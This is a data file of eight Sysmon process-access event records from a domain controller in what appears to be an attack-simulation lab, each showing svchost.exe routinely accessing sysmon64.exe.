{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4616,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4617,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4618,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4619,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4620,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4621,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4622,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4623,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
